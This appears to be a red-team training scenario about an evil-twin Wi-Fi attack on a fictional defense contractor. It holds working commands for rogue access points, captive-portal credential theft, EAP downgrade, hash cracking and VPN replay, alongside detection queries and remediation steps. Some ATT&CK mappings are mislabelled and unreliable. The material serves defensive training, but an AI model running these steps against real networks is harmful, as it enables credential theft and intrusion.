SC-094: Wireless Evil Twin — Operation SIGNAL THIEF¶
Scenario Overview¶
| Field | Detail |
|---|---|
| ID | SC-094 |
| Category | Network Security / Wireless / Physical Security |
| Severity | High |
| ATT&CK Tactics | Initial Access, Credential Access, Collection, Man-in-the-Middle |
| ATT&CK Techniques | T1557 (Adversary-in-the-Middle), T1040 (Network Sniffing), T1557.002 (ARP Cache Poisoning) |
| Target Environment | Corporate campus with 6 buildings, 240 enterprise wireless APs, WPA2-Enterprise with 802.1X/EAP-TLS and RADIUS, supporting 1,800 employees at a defense contractor |
| Difficulty | ★★★★☆ |
| Duration | 2–3 hours |
| Estimated Impact | 42 devices connected to rogue APs; 28 credential pairs captured via captive portal; 8 RADIUS challenge-response pairs intercepted; 12 session cookies harvested; 4-hour dwell time before WIDS detection; full remediation requiring credential rotation for all affected users |
Narrative¶
Sentinel Dynamics, a fictional mid-tier defense contractor at sentinel-dynamics.example.com, operates a corporate campus across 6 buildings in the research triangle area. The organization employs 1,800 staff working on classified and unclassified programs, with 240 Cisco wireless access points managed by a centralized Wireless LAN Controller (WLC). The primary wireless network (SSID: SentinelCorpSecure) uses WPA2-Enterprise with 802.1X/EAP-TLS authentication against a RADIUS server backed by Active Directory certificate services.
However, the campus also broadcasts a guest network (SSID: SentinelGuest) using a captive portal with simple username/password authentication, and a legacy IoT network (SSID: SentinelIoT) using WPA2-PSK for building management systems. The IT team has deployed a Wireless Intrusion Detection System (WIDS) through their WLC, but the sensor coverage has gaps in parking areas and the lobby of Building 3, which was recently renovated.
In April 2026, a red team operator from threat group RADIO FALCON v2 — a physical/wireless penetration testing team simulating an advanced threat actor — deploys a multi-vector wireless attack from the Building 3 parking garage. The attack targets all three SSIDs with tailored approaches: an evil twin captive portal for the guest network, a rogue AP with downgraded EAP for the corporate network, and a PSK capture for the IoT network.
Attack Flow¶
graph TD
A[Phase 1: Wireless Reconnaissance<br/>Survey SSIDs, BSSIDs, channels, clients] --> B[Phase 2: Evil Twin Deployment<br/>Clone corporate and guest SSIDs]
B --> C[Phase 3: Captive Portal Credential Theft<br/>Harvest guest network credentials]
C --> D[Phase 4: 802.1X Downgrade Attack<br/>Force EAP-TTLS/MSCHAPv2 fallback]
D --> E[Phase 5: RADIUS Credential Capture<br/>Intercept challenge-response pairs]
E --> F[Phase 6: Session Hijacking<br/>MitM traffic on rogue AP for cookie theft]
F --> G[Phase 7: Lateral Movement<br/>Use captured credentials on corporate network]
G --> H[Phase 8: Detection & Response<br/>WIDS alert + RF containment]Phase Details¶
Phase 1: Wireless Reconnaissance¶
ATT&CK Technique: T1040 (Network Sniffing)
RADIO FALCON v2 conducts passive wireless reconnaissance from the Building 3 parking garage, using a directional antenna to survey all broadcasting SSIDs, identify access point BSSIDs and channels, enumerate connected clients, and map the wireless security posture. This phase is entirely passive and generates no detectable wireless traffic.
# Simulated wireless reconnaissance (educational only)
# Attacker conducts passive survey from parking garage
# Put wireless adapter into monitor mode (simulated)
$ sudo airmon-ng start wlan0
# Passive scan of all channels (simulated output)
$ sudo airodump-ng wlan0mon --band abg --output-format csv -w recon
# Discovered wireless networks (synthetic):
BSSID PWR CH ENC ESSID
AA:BB:CC:11:22:33 -42 6 WPA2-Enterprise SentinelCorpSecure
AA:BB:CC:11:22:34 -38 36 WPA2-Enterprise SentinelCorpSecure
AA:BB:CC:11:22:35 -55 11 WPA2-Enterprise SentinelCorpSecure
AA:BB:CC:44:55:66 -40 1 Open+Portal SentinelGuest
AA:BB:CC:44:55:67 -45 44 Open+Portal SentinelGuest
AA:BB:CC:77:88:99 -60 6 WPA2-PSK SentinelIoT
AA:BB:CC:77:88:9A -65 11 WPA2-PSK SentinelIoT
# Connected clients to SentinelCorpSecure (partial):
STATION BSSID PWR Probes
DD:EE:FF:11:11:11 AA:BB:CC:11:22:33 -48 SentinelCorpSecure
DD:EE:FF:22:22:22 AA:BB:CC:11:22:34 -52 SentinelCorpSecure
DD:EE:FF:33:33:33 AA:BB:CC:11:22:35 -61 SentinelCorpSecure,SentinelGuest
# Key observations:
# - SentinelCorpSecure: WPA2-Enterprise (802.1X) — 3 APs visible
# - SentinelGuest: Open with captive portal — 2 APs visible
# - SentinelIoT: WPA2-PSK — 2 APs visible (building management)
# - Client DD:EE:FF:33:33:33 probes for BOTH corporate and guest SSIDs
# → This client will auto-connect to whichever SSID responds first
# - Building 3 parking garage has -40 dBm signal to nearest guest AP
# → Strong enough to deploy a convincing evil twin
# Channel utilization analysis:
# Channel 1: SentinelGuest AP (low utilization)
# Channel 6: SentinelCorpSecure + SentinelIoT (medium utilization)
# Channel 36: SentinelCorpSecure (5GHz — lower range, fewer clients)
Phase 2: Evil Twin AP Deployment¶
ATT&CK Technique: T1557 (Adversary-in-the-Middle)
RADIO FALCON v2 deploys two rogue access points from the parking garage: one cloning the SentinelGuest SSID with an identical captive portal, and another cloning SentinelCorpSecure with a modified EAP configuration. The rogue APs broadcast at higher power than the legitimate APs, causing nearby clients to preferentially associate with the attacker's infrastructure.
# Simulated evil twin deployment (educational only)
# Attacker deploys rogue APs mimicking corporate SSIDs
# Equipment used (educational reference):
# - 2x USB wireless adapters with external antenna connectors
# - 1x directional panel antenna (for targeted coverage)
# - 1x omnidirectional antenna (for broad coverage)
# - Laptop running hostapd, dnsmasq, and custom captive portal
# - 4G LTE uplink for internet connectivity (upstream)
# Rogue AP 1: Clone SentinelGuest (captive portal attack)
# hostapd configuration (simulated):
interface=wlan1
driver=nl80211
ssid=SentinelGuest
hw_mode=g
channel=1
wmm_enabled=0
auth_algs=1
wpa=0
# Broadcasting as open network with captive portal (matches legitimate)
# TX power: 30 dBm (legitimate APs: 20 dBm)
# → Clients near Building 3 will see stronger signal from rogue AP
# Rogue AP 2: Clone SentinelCorpSecure (EAP downgrade)
# hostapd-wpe configuration (simulated):
interface=wlan2
driver=nl80211
ssid=SentinelCorpSecure
hw_mode=a
channel=36
ieee8021x=1
eapol_version=2
eap_server=1
eap_user_file=/etc/hostapd-wpe/users
server_cert=/etc/hostapd-wpe/certs/server.pem
private_key=/etc/hostapd-wpe/certs/server.key
# The rogue AP presents a self-signed certificate
# Clients with strict certificate validation will reject
# Clients with "trust on first use" or suppressed cert warnings will connect
# Start dnsmasq for DHCP and DNS on rogue AP 1
$ dnsmasq --interface=wlan1 \
--dhcp-range=192.168.100.10,192.168.100.100,12h \
--address=/#/192.168.100.1 \
--no-resolv --log-queries
# Redirect all HTTP/HTTPS traffic to captive portal
$ iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 80 \
-j REDIRECT --to-port 8080
$ iptables -t nat -A PREROUTING -i wlan1 -p tcp --dport 443 \
-j REDIRECT --to-port 8443
# Results after 30 minutes:
# SentinelGuest evil twin: 28 clients associated
# SentinelCorpSecure evil twin: 14 clients attempted connection
# - 6 clients rejected certificate (strict validation — EAP-TLS)
# - 8 clients accepted certificate (misconfigured supplicants)
Phase 3: Captive Portal Credential Theft¶
ATT&CK Technique: T1557 (Adversary-in-the-Middle)
The rogue SentinelGuest AP presents a pixel-perfect clone of the legitimate Sentinel Dynamics captive portal. When users connect to the evil twin, they are redirected to the fake portal which prompts for their corporate credentials. Many users authenticate with their Active Directory username and password, expecting the normal guest network experience.
# Simulated captive portal credential theft (educational only)
# Attacker serves fake captive portal matching corporate branding
# Captive portal served at 192.168.100.1:8080 (simulated)
# The portal is a clone of the legitimate SentinelGuest login page:
#
# ┌──────────────────────────────────────────┐
# │ SENTINEL DYNAMICS │
# │ Guest Wireless Access │
# │ │
# │ Username: [________________________] │
# │ Password: [________________________] │
# │ │
# │ ☐ I agree to the Acceptable Use Policy │
# │ │
# │ [ Connect ] │
# │ │
# │ Trouble connecting? Contact IT Help │
# │ Desk at ext. 4357 │
# └──────────────────────────────────────────┘
# Captured credentials are logged (simulated):
[2026-04-01 10:22:15] CREDENTIAL CAPTURED
Source MAC: DD:EE:FF:44:44:44
IP: 192.168.100.12
Username: m.rodriguez@sentinel-dynamics.example.com
Password: REDACTED
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_0)
Action: Redirected to real internet (via 4G uplink)
[2026-04-01 10:25:33] CREDENTIAL CAPTURED
Source MAC: DD:EE:FF:55:55:55
IP: 192.168.100.15
Username: j.chen@sentinel-dynamics.example.com
Password: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Action: Redirected to real internet (via 4G uplink)
# After providing credentials, users are connected to the internet
# via the attacker's 4G uplink — they experience normal connectivity
# and don't suspect compromise
# Results over 2 hours:
# Total clients connected to rogue SentinelGuest: 42
# Clients who entered credentials: 28
# Unique credential pairs captured: 28
# Credentials using AD format (DOMAIN\user or user@domain): 24
# Credentials with potential reuse on corporate network: 24
# Users who noticed anything suspicious: 0
Phase 4: 802.1X EAP Downgrade Attack¶
ATT&CK Technique: T1557.002 (ARP Cache Poisoning)
For the corporate network attack, RADIO FALCON v2 exploits clients whose 802.1X supplicants are configured to accept EAP-TTLS or PEAP in addition to EAP-TLS. The rogue AP advertises support only for EAP-TTLS/MSCHAPv2, forcing clients that support multiple EAP methods to fall back from certificate-based authentication to password-based authentication. The inner MSCHAPv2 challenge-response is captured for offline cracking.
# Simulated 802.1X downgrade attack (educational only)
# Rogue AP forces EAP method downgrade from EAP-TLS to EAP-TTLS/MSCHAPv2
# The legitimate SentinelCorpSecure network supports:
# - EAP-TLS (primary — certificate-based, strongest)
# - EAP-TTLS/MSCHAPv2 (fallback — password-based, vulnerable)
# - PEAP/MSCHAPv2 (legacy — password-based, vulnerable)
#
# Some client supplicants are configured to accept ANY EAP method
# offered by the AP, rather than pinning to EAP-TLS only
# hostapd-wpe captures the MSCHAPv2 challenge-response (simulated):
[2026-04-01 10:35:22] EAP-TTLS/MSCHAPv2 CHALLENGE-RESPONSE CAPTURED
Client MAC: DD:EE:FF:66:66:66
Identity: SENTINEL\a.patel
Challenge: 8d7f3a2b1c4e5f60
Response: a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6
# This challenge-response can be cracked offline
[2026-04-01 10:38:45] EAP-TTLS/MSCHAPv2 CHALLENGE-RESPONSE CAPTURED
Client MAC: DD:EE:FF:77:77:77
Identity: SENTINEL\k.washington
Challenge: 2e4f6a8b0c1d3e5f
Response: f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1
# This challenge-response can be cracked offline
[2026-04-01 10:41:18] EAP-TLS REJECTED — CLIENT VALIDATED CERTIFICATE
Client MAC: DD:EE:FF:88:88:88
Identity: SENTINEL\r.nakamura
Reason: Certificate validation failed — client pinned to corporate CA
Result: Client disconnected and refused to associate
# Properly configured supplicant — attack failed for this client
# MSCHAPv2 offline cracking (simulated):
# The captured challenge-response pairs are converted to hashcat format
$ cat mschapv2_hashes.txt
SENTINEL\a.patel:::8d7f3a2b1c4e5f60:a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6:REDACTED
SENTINEL\k.washington:::2e4f6a8b0c1d3e5f:f6e5d4c3b2a1f0e9d8c7b6a5f4e3d2c1:REDACTED
# Results:
# Total clients attempting 802.1X on rogue AP: 14
# Clients that rejected cert (EAP-TLS pinned): 6 — ATTACK FAILED
# Clients that downgraded to EAP-TTLS/MSCHAPv2: 8 — CAPTURED
# Challenge-response pairs for offline cracking: 8
# Successfully cracked (simulated): 5 of 8
Phase 5: RADIUS Credential Capture and Replay¶
ATT&CK Technique: T1040 (Network Sniffing)
With captured and cracked credentials from both the captive portal and EAP downgrade attacks, RADIO FALCON v2 now possesses valid Active Directory credentials for 29 unique users. The attacker validates these credentials against the legitimate corporate wireless network and internal services accessible from the guest network segment.
# Simulated credential validation (educational only)
# Attacker validates captured credentials against corporate services
# Credential inventory after 2 hours of operation:
# Source 1 — Captive portal (SentinelGuest evil twin):
# 24 AD credentials captured in cleartext
# Source 2 — EAP downgrade (SentinelCorpSecure evil twin):
# 5 AD credentials cracked from MSCHAPv2 challenge-response
# Total unique valid AD credentials: 29 (some overlap)
# Accounts with admin group membership: 3 (discovered later)
# Validate credentials against legitimate network (simulated)
# Attacker connects to real SentinelGuest with a captured credential
# and tests access to internal services visible from guest VLAN
# Guest VLAN network scan reveals exposed services:
$ nmap -sT -Pn --top-ports 20 10.50.0.0/24
# Exposed services from guest VLAN (misconfiguration):
# 10.50.0.10:443 — Internal web portal (should not be guest-accessible)
# 10.50.0.20:389 — LDAP (should not be guest-accessible)
# 10.50.0.30:8443 — VPN gateway login page
# Test captured credential against VPN gateway
$ curl -sk "https://10.50.0.30:8443/login" \
-d "username=m.rodriguez@sentinel-dynamics.example.com" \
-d "password=REDACTED"
# Response: HTTP 302 → /portal/home
# VPN authentication successful with captured guest portal credential!
# The user reused their AD password on the guest portal
# and the VPN gateway is accessible from the guest VLAN
Phase 6: Session Hijacking on Rogue AP¶
ATT&CK Technique: T1557 (Adversary-in-the-Middle)
While users are connected to the rogue APs, all their network traffic flows through the attacker's infrastructure. RADIO FALCON v2 performs SSL stripping and session cookie interception on HTTP traffic, and logs DNS queries to map the victim's browsing patterns and internal service access.
# Simulated session hijacking (educational only)
# Attacker intercepts traffic flowing through rogue AP
# DNS query logging reveals internal service URLs
[10:30:15] 192.168.100.12 → intranet.sentinel-dynamics.example.com
[10:30:22] 192.168.100.15 → jira.sentinel-dynamics.example.com
[10:31:05] 192.168.100.12 → confluence.sentinel-dynamics.example.com
[10:31:18] 192.168.100.20 → gitlab.sentinel-dynamics.example.com
[10:32:44] 192.168.100.15 → mail.sentinel-dynamics.example.com
# HTTP session cookie interception (for non-HSTS sites)
# Note: modern HSTS and certificate pinning prevent most cookie theft
# but some internal applications lack HSTS headers
[2026-04-01 10:33:12] SESSION COOKIE INTERCEPTED
Client: 192.168.100.12
Host: intranet.sentinel-dynamics.example.com
Cookie: JSESSIONID=ABC123DEF456EXAMPLE
Protocol: HTTP (not HTTPS — internal site without TLS)
Risk: Session can be replayed for intranet access
[2026-04-01 10:35:44] SESSION COOKIE INTERCEPTED
Client: 192.168.100.20
Host: confluence.sentinel-dynamics.example.com
Cookie: seraph.confluence=REDACTED
Protocol: HTTP (Confluence without enforced HTTPS)
Risk: Full Confluence access with user's session
# Results:
# Session cookies captured: 12 (from non-HTTPS internal services)
# DNS queries logged: 847 (mapping internal infrastructure)
# HTTPS traffic: encrypted — NOT interceptable (HSTS enforced)
# Internal services without HTTPS: 4 identified
Phase 7: Lateral Movement via Captured Credentials¶
ATT&CK Technique: T1557 (Adversary-in-the-Middle)
Using validated credentials and session cookies, RADIO FALCON v2 authenticates to the corporate VPN from a separate device, gaining full corporate network access. The attacker then uses the captured credentials to access internal systems, escalate privileges, and demonstrate the impact of the wireless attack vector.
# Simulated lateral movement (educational only)
# Attacker uses captured credentials to access corporate network
# Connect to corporate VPN using captured credentials
# VPN client connection (simulated):
$ openconnect https://10.50.0.30:8443 \
--user=m.rodriguez@sentinel-dynamics.example.com \
--passwd-on-stdin <<< "REDACTED"
# Connected to corporate network:
# Tunnel IP: 10.100.50.25
# DNS: 10.1.0.10, 10.1.0.11
# Routes: 10.0.0.0/8 via tunnel
# Enumerate internal services with captured credentials
$ ldapsearch -H ldap://10.1.0.10 \
-D "m.rodriguez@sentinel-dynamics.example.com" \
-w "REDACTED" \
-b "DC=sentinel-dynamics,DC=example,DC=com" \
"(memberOf=CN=IT-Admins,OU=Groups,DC=sentinel-dynamics,DC=example,DC=com)" \
sAMAccountName
# IT Admin group members discovered:
# a.patel (credentials also captured via EAP downgrade!)
# t.williams
# s.kumar
# r.nakamura (EAP downgrade failed — cert pinned)
# a.patel has IT Admin privileges AND their credentials were captured
# This enables privileged access to internal systems
# Access internal systems with IT Admin credentials (simulated):
$ curl -sk "https://sccm.sentinel-dynamics.example.com/admin" \
-u "SENTINEL\a.patel:REDACTED"
# Response: HTTP 200 — SCCM Admin Console accessible
# The attacker now has access to the endpoint management system
# from a wireless attack that started in a parking garage
# Impact summary (synthetic):
# Credentials captured: 29 unique AD accounts
# Privileged accounts compromised: 3 (including 1 IT Admin)
# VPN access established: yes (from guest VLAN)
# Internal systems accessed: VPN, intranet, Confluence, SCCM
# Data accessible: internal documentation, endpoint management
# Attack duration: 2.5 hours of rogue AP operation
Phase 8: Detection & Response¶
The attack is detected through multiple monitoring channels:
Channel 1 (T+2 hours): WIDS Rogue AP Alert — The Cisco WLC Wireless Intrusion Detection System detects a rogue AP broadcasting SentinelCorpSecure on channel 36 with a BSSID not in the managed AP inventory. The detection was delayed because the rogue AP was in a parking garage with limited WIDS sensor coverage.
Channel 2 (T+3 hours): RADIUS Authentication Anomaly — The RADIUS server logs show 8 EAP-TTLS/MSCHAPv2 authentication attempts from the rogue AP's BSSID, which is not a managed AP. Legitimate APs only use EAP-TLS for the corporate SSID.
Channel 3 (T+4 hours): VPN Geolocation Anomaly — The VPN gateway flags a login from m.rodriguez from an IP address (198.51.100.44) not associated with any known office location, while m.rodriguez's laptop is still connected to the corporate network at the main campus.
# Simulated detection timeline (educational only)
[2026-04-01 12:30:00 UTC] WIDS — ROGUE AP DETECTED
Alert: ROGUE_AP_SSID_CLONE
Details:
- Rogue BSSID: FF:AA:BB:CC:DD:EE (not in managed AP inventory)
- SSID: SentinelCorpSecure
- Channel: 36 (5 GHz)
- Signal strength: -35 dBm (unusually strong — high TX power)
- Location estimate: Building 3 parking area (limited sensor coverage)
- Clients associated: 8
Severity: HIGH
Action: RF containment initiated from nearest managed APs
[2026-04-01 13:15:00 UTC] RADIUS — EAP METHOD ANOMALY
Alert: UNEXPECTED_EAP_METHOD
Details:
- Authentication attempts: 8 via EAP-TTLS/MSCHAPv2
- Expected method: EAP-TLS only (corporate policy)
- Source BSSID: FF:AA:BB:CC:DD:EE (matches rogue AP alert)
- Identities: SENTINEL\a.patel, SENTINEL\k.washington, +6 others
- All attempts from unmanaged AP — ILLEGITIMATE
Severity: CRITICAL
Action: Credentials for affected users flagged for reset
[2026-04-01 14:00:00 UTC] VPN — IMPOSSIBLE TRAVEL ALERT
Alert: CONCURRENT_SESSION_ANOMALY
Details:
- User: m.rodriguez@sentinel-dynamics.example.com
- Session 1: Corporate network (10.1.5.100) — active since 08:00
- Session 2: VPN from 198.51.100.44 — started at 13:45
- Distance: >500 miles between locations
- Time gap: concurrent sessions
Severity: CRITICAL
Action: VPN session terminated, account locked
Detection Queries:
// KQL — Detect rogue AP via WIDS/WLC events
WirelessControllerLogs
| where TimeGenerated > ago(24h)
| where EventType in ("RogueAPDetected", "RogueAPSpoofedSSID")
| extend RogueBSSID = tostring(parse_json(EventData).bssid)
| extend SpoofedSSID = tostring(parse_json(EventData).ssid)
| extend SignalStrength = toint(parse_json(EventData).rssi)
| extend Channel = toint(parse_json(EventData).channel)
| extend ClientCount = toint(parse_json(EventData).associatedClients)
| where SpoofedSSID in ("SentinelCorpSecure", "SentinelGuest")
| project TimeGenerated, RogueBSSID, SpoofedSSID, SignalStrength,
Channel, ClientCount
// KQL — Detect EAP method downgrade attacks via RADIUS logs
SecurityEvent
| where TimeGenerated > ago(24h)
| where EventID == 6273 or EventID == 6274 // NPS authentication events
| extend EAPMethod = tostring(EventData)
| where EAPMethod has "EAP-TTLS" or EAPMethod has "MSCHAPv2"
| extend CallingStationId = extract(@"Calling-Station-Id:\s*(\S+)", 1, EventData)
| extend CalledStationId = extract(@"Called-Station-Id:\s*(\S+)", 1, EventData)
| extend UserName = TargetUserName
| summarize AttemptCount = count(),
Users = make_set(UserName),
SourceMACs = make_set(CallingStationId)
by CalledStationId, bin(TimeGenerated, 1h)
| where AttemptCount > 3
| project TimeGenerated, CalledStationId, AttemptCount, Users, SourceMACs
// KQL — Detect concurrent VPN and corporate network sessions
SigninLogs
| where TimeGenerated > ago(24h)
| where AppDisplayName has "VPN"
| extend VPNUser = UserPrincipalName, VPNIP = IPAddress
| join kind=inner (
SigninLogs
| where TimeGenerated > ago(24h)
| where AppDisplayName !has "VPN"
| where NetworkLocationDetails has "corporate"
| extend CorpUser = UserPrincipalName, CorpIP = IPAddress
) on $left.VPNUser == $right.CorpUser
| where abs(datetime_diff('minute', TimeGenerated, TimeGenerated1)) < 30
| where VPNIP != CorpIP
| project TimeGenerated, VPNUser, VPNIP, CorpIP,
TimeDelta_Minutes = datetime_diff('minute', TimeGenerated, TimeGenerated1)
// KQL — Detect captive portal credential harvesting via DNS anomaly
DnsEvents
| where TimeGenerated > ago(24h)
| where Name has "sentinel-dynamics.example.com"
| extend ResolvedIP = tostring(IPAddresses)
| where ResolvedIP startswith "192.168." or ResolvedIP startswith "10.100."
| summarize QueryCount = count(),
UniqueClients = dcount(ClientIP),
ResolvedIPs = make_set(ResolvedIP)
by Name, bin(TimeGenerated, 30m)
| where QueryCount > 20 and UniqueClients > 5
| project TimeGenerated, Name, QueryCount, UniqueClients, ResolvedIPs
# SPL — Detect rogue AP via WIDS/WLC events
index=wireless sourcetype=cisco:wlc
(event_type="RogueAPDetected" OR event_type="RogueAPSpoofedSSID")
| spath output=rogue_bssid path=bssid
| spath output=spoofed_ssid path=ssid
| spath output=signal_strength path=rssi
| spath output=channel path=channel
| spath output=client_count path=associatedClients
| where spoofed_ssid IN ("SentinelCorpSecure", "SentinelGuest")
| table _time, rogue_bssid, spoofed_ssid, signal_strength,
channel, client_count
# SPL — Detect EAP method downgrade attacks via RADIUS logs
index=radius sourcetype=microsoft:nps
(EventCode=6273 OR EventCode=6274)
| where match(EAPType, "(EAP-TTLS|MSCHAPv2)")
| rename Calling_Station_Id as source_mac,
Called_Station_Id as ap_bssid,
User_Name as username
| bin _time span=1h
| stats count as attempt_count,
values(username) as users,
values(source_mac) as source_macs
by ap_bssid, _time
| where attempt_count > 3
| table _time, ap_bssid, attempt_count, users, source_macs
# SPL — Detect concurrent VPN and corporate network sessions
index=vpn sourcetype=vpn:auth action=success
| rename user as vpn_user, src_ip as vpn_ip
| join vpn_user [
search index=windows sourcetype=WinEventLog:Security EventCode=4624
| where LogonType=3
| rename TargetUserName as vpn_user, IpAddress as corp_ip
| where match(corp_ip, "^10\.")
]
| where vpn_ip != corp_ip
| eval time_diff = abs(_time - _time)
| where time_diff < 1800
| table _time, vpn_user, vpn_ip, corp_ip, time_diff
# SPL — Detect captive portal credential harvesting via DNS anomaly
index=dns sourcetype=dns
query="*sentinel-dynamics.example.com*"
| where match(answer, "^(192\.168\.|10\.100\.)")
| bin _time span=30m
| stats count as query_count,
dc(src_ip) as unique_clients,
values(answer) as resolved_ips
by query, _time
| where query_count > 20 AND unique_clients > 5
| table _time, query, query_count, unique_clients, resolved_ips
Incident Response:
# Simulated incident response (educational only)
[2026-04-01 14:15:00 UTC] ALERT: Wireless Evil Twin incident response activated
[2026-04-01 14:20:00 UTC] ACTION: RF containment
- WLC RF containment activated for rogue BSSID FF:AA:BB:CC:DD:EE
- Nearby managed APs broadcasting deauth frames to rogue AP clients
- Physical security dispatched to Building 3 parking area
- All rogue AP BSSIDs added to WLC containment list
[2026-04-01 14:30:00 UTC] ACTION: Credential remediation
- All 29 affected user accounts PASSWORD RESET forced
- VPN sessions from non-corporate IPs TERMINATED
- MFA re-enrollment REQUIRED for all affected users
- Conditional Access: block VPN from unrecognized devices (24h)
[2026-04-01 14:45:00 UTC] ACTION: Wireless security hardening
- 802.1X supplicant GPO updated: EAP-TLS ONLY (remove TTLS/PEAP fallback)
- Certificate pinning enforced for RADIUS server certificate
- Guest network: implement device registration + MAC filtering
- WIDS sensor coverage expanded to parking areas
[2026-04-01 15:00:00 UTC] ACTION: Network segmentation review
- Guest VLAN ACLs tightened: block access to internal services
- VPN gateway: require certificate + password (mutual auth)
- Internal services: enforce HTTPS with HSTS on all web applications
[2026-04-01 16:00:00 UTC] ACTION: Impact assessment
Rogue APs deployed: 2 (SentinelGuest + SentinelCorpSecure)
Devices connected to rogue APs: 42
Credentials captured (captive portal): 28
Credentials captured (EAP downgrade): 8 (5 cracked)
Session cookies intercepted: 12
VPN access achieved: Yes (from captured credentials)
Internal systems accessed: Intranet, Confluence, SCCM
Privileged accounts compromised: 3 (1 IT Admin)
Dwell time: 4 hours (deployment to WIDS detection)
Physical security gap: Parking garage outside WIDS coverage
Decision Points (Tabletop Exercise)¶
Decision Point 1 — Wireless Architecture
Your corporate wireless network supports both EAP-TLS and EAP-TTLS/MSCHAPv2 to accommodate legacy devices. How do you migrate all devices to EAP-TLS only while maintaining access for devices that cannot support certificate-based authentication? What timeline and communication plan would you implement?
Decision Point 2 — Guest Network Isolation
A scan from the guest VLAN reveals that internal services (LDAP, VPN gateway, internal web apps) are reachable. How do you redesign your guest network segmentation? What network access control (NAC) and firewall rules would prevent this lateral access?
Decision Point 3 — WIDS Coverage Gaps
Your WIDS has coverage gaps in parking areas and recently renovated spaces. How do you prioritize expanding sensor coverage? What alternative detection methods (managed device telemetry, network anomaly detection) complement WIDS for detecting rogue APs?
Decision Point 4 — Physical Security Integration
The attacker operated from a parking garage for 4 hours. How do you integrate physical security (cameras, badge access, security patrols) with wireless security monitoring to detect and respond to physical wireless threats? What procedures link your SOC with physical security teams?
Lessons Learned¶
Key Takeaways
-
EAP method downgrade defeats WPA2-Enterprise security — If client supplicants accept multiple EAP methods, a rogue AP can force downgrade from certificate-based EAP-TLS to password-based EAP-TTLS/MSCHAPv2, enabling offline credential cracking. Organizations must enforce EAP-TLS only via supplicant configuration policies and pin the RADIUS server certificate.
-
Guest network captive portals harvest corporate credentials — Users routinely enter their corporate credentials into captive portals, especially when the portal mimics corporate branding. Guest networks should use separate credential systems (temporary codes, SMS verification) never linked to corporate Active Directory.
-
WIDS coverage gaps create blind spots for rogue AP detection — Wireless intrusion detection only works where sensors have coverage. Parking areas, lobbies, and recently renovated spaces often lack sufficient sensor density. Supplementary detection using managed device telemetry (detecting when corporate devices connect to unknown APs) fills these gaps.
-
Guest-to-corporate network segmentation is critical — Services accessible from the guest VLAN dramatically increase the impact of guest credential compromise. Strict ACLs should ensure guest traffic can only reach the internet, with no routes to internal services, VPN gateways, or management interfaces.
-
Internal services without HTTPS enable session hijacking — Any internal web application served over HTTP is vulnerable to session cookie interception when users are on a compromised network. HSTS with preloading should be enforced on all internal services, regardless of whether they are "internal only."
-
Credential reuse between guest and corporate networks amplifies impact — Users entering their AD credentials on the guest captive portal gave attackers the same credentials used for VPN, email, and internal systems. Password managers and single-sign-on with phishing-resistant MFA break this reuse chain.
MITRE ATT&CK Mapping¶
| Technique ID | Technique Name | Phase |
|---|---|---|
| T1040 | Network Sniffing | Reconnaissance (passive wireless survey) |
| T1557 | Adversary-in-the-Middle | Initial Access (evil twin AP deployment) |
| T1557 | Adversary-in-the-Middle | Credential Access (captive portal + session hijack) |
| T1557.002 | ARP Cache Poisoning | Credential Access (802.1X EAP downgrade) |
| T1040 | Network Sniffing | Collection (RADIUS challenge-response capture) |
| T1078.001 | Valid Accounts: Default Accounts | Lateral Movement (credential reuse for VPN) |